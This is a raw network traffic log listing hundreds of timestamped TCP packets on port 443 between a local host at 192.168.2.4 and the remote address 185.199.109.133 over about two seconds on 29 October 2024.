Oct 29, 2024 22:04:16.239733934 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.357916117 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.357980013 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.358009100 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.358035088 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.358091116 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.358091116 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.358354092 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.358406067 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.358441114 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.358453989 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.358483076 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.358501911 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.358866930 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.358921051 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.358961105 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.358973026 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.358999014 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.359034061 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.405698061 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.405742884 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.405785084 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.405807018 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.405846119 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.405860901 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.480993986 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.481015921 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.481080055 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.481101036 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.481129885 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.481216908 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.481672049 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.481688976 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.481723070 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.481736898 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.481762886 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.481780052 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.482100964 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.482116938 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.482165098 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.482178926 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.482227087 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.482676983 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.482692957 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.482732058 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.482744932 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.482773066 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.482791901 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.604233027 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.604253054 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.604315042 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.604365110 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.604485035 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.604538918 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.604556084 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.604573965 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.604600906 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.605067968 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.605082989 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.605139971 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.605156898 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.605591059 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.605603933 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.605645895 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.605659962 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.605684042 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.651691914 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.651714087 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.651755095 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.651772022 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.651823044 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.704540014 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.742539883 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.742573977 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.742619991 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.742643118 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.742670059 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.742697954 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.742708921 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.742808104 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.742858887 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.742878914 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.742897987 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.742924929 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.742933989 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.743033886 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.743076086 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.743093967 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.743117094 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.743140936 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.743185043 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.743238926 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.743283033 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.743304968 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.743341923 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.743374109 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.743374109 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.850811005 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.850872040 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.851059914 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.851083040 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.851146936 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.851224899 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.851269960 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.851310015 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.851344109 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.851376057 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.851645947 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.851694107 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.851721048 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.851739883 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.851768017 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.851783037 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.851936102 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.851980925 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.852014065 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.852026939 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.852050066 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.852066040 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.898353100 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.898396969 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.898480892 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.898499966 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.898530960 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.898893118 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.980490923 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.980530024 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.980618954 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.980633020 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.980673075 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.980715990 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.980737925 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.980767965 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.980779886 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.980804920 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.980827093 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.981007099 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.981039047 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.981072903 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.981089115 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.981112003 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.981363058 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.981389046 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.981432915 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.981445074 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:16.981477022 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:16.984842062 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.021445990 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.021491051 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.021538973 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.021553993 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.021579027 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.021622896 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.098195076 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.098253012 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.098283052 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.098299980 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.098330975 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.098351002 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.099020004 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.099061012 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.099097013 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.099111080 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.099139929 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.099160910 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.100018978 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.100058079 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.100099087 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.100111961 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.100138903 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.100157976 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.100509882 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.100550890 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.100584984 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.100596905 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.100624084 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.100642920 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.101509094 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.101547003 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.101598024 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.101612091 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.101640940 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.101660967 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.221292973 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.221342087 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.221407890 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.221430063 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.221462965 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.221575022 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.221955061 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.222013950 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.222033024 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.222050905 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.222074986 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.222093105 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.222836018 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.222875118 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.222908974 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.222922087 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.222950935 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.222974062 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.223566055 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.223604918 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.223635912 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.223648071 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.223671913 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.223691940 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.224287987 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.224328041 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.224363089 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.224376917 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.224420071 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.224420071 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.269212008 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.269243002 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.269300938 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.269315004 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.269339085 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.271989107 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.344575882 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.344600916 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.344675064 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.344688892 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.344772100 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.345300913 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.345319986 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.345401049 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.345413923 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.345462084 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.346317053 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.346337080 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.346396923 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.346410990 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.346458912 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.346856117 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.346875906 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.346925020 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.346937895 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.346962929 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.347006083 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.347208977 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.347229958 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.347280979 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.347292900 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.347336054 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.392987013 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.393049955 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.393121958 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.393136978 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.393191099 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.468100071 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.468157053 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.468334913 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.468364000 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.468436003 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.469116926 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.469167948 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.469208002 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.469222069 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.469249010 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.469278097 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.469702959 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.469749928 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.469786882 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.469799995 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.469829082 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.469866037 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.470247984 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.470288992 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.470323086 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.470335007 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.470360994 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.470377922 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.470650911 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.470690012 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.470720053 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.470732927 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.470760107 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.470783949 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.557172060 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.557221889 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.557260990 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.557276964 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.557307005 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.557327986 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.591284990 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.591351032 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.591401100 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.591422081 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.591444969 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.591464043 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.591941118 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.591984034 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.592014074 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.592025995 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.592051029 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.592071056 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.592691898 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.592750072 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.592771053 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.592788935 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.592817068 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.592837095 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.593574047 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.593614101 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.593667984 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.593668938 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.593684912 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.593734026 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.593924999 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.593966961 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.593998909 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.594011068 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.594037056 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.594055891 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.594362974 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.594403982 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.594435930 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.594448090 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.594470978 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.594486952 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.741497040 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.741528988 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.741564035 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.741584063 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.741607904 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.741607904 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.741631031 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.741642952 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.741647959 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.741662979 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.741684914 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.741714954 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.741878986 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.741908073 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.741939068 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.741951942 CET	443	49731	185.199.109.133	192.168.2.4
Oct 29, 2024 22:04:17.741982937 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.741997957 CET	49731	443	192.168.2.4	185.199.109.133
Oct 29, 2024 22:04:17.742208004 CET	443	49731	185.199.109.133	192.168.2.4
